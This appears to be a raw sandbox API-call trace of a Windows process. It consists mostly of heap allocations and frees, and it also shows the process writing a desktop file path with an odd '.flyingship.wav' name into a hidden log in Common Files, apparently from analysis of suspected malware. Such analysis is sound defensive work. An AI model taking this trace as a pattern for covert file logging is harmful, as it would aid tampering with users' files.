Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.566] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0158.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0158.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0158.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0158.566] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0158.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.566] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.567] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.568] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0158.568] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.568] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0158.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0158.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0158.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.569] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0158.569] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x53b, lpOverlapped=0x0) returned 1 [0158.569] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0158.570] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x53b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.570] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0158.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0158.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0158.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.flyingship.wav\r\n", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0158.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x41) returned 0x9aa4f8 [0158.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.flyingship.wav\r\n", cchWideChar=65, lpMultiByteStr=0x9aa4f8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 65 [0158.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0158.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0158.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0158.570] WriteFile (in: hFile=0x138, lpBuffer=0x923ad0*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923ad0*, lpNumberOfBytesWritten=0x87f43c*=0x40, lpOverlapped=0x0) returned 1 [0158.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0158.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.570] CloseHandle (hObject=0x138) returned 1 [0158.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0158.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0158.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0158.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0158.572] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0158.572] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0158.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0158.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0158.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0158.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0158.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0158.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0158.575] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0158.575] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.575] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0158.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0158.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0158.575] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0158.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0158.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b50 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0158.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0158.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba078 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0158.576] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0158.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0158.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0158.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0158.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0158.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0158.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0158.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0158.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0158.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0158.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0158.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0158.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0158.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0158.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0158.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0158.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0158.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0158.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0158.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0158.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0158.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0158.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0158.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0158.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0158.580] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0158.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0158.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0158.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0158.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0158.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 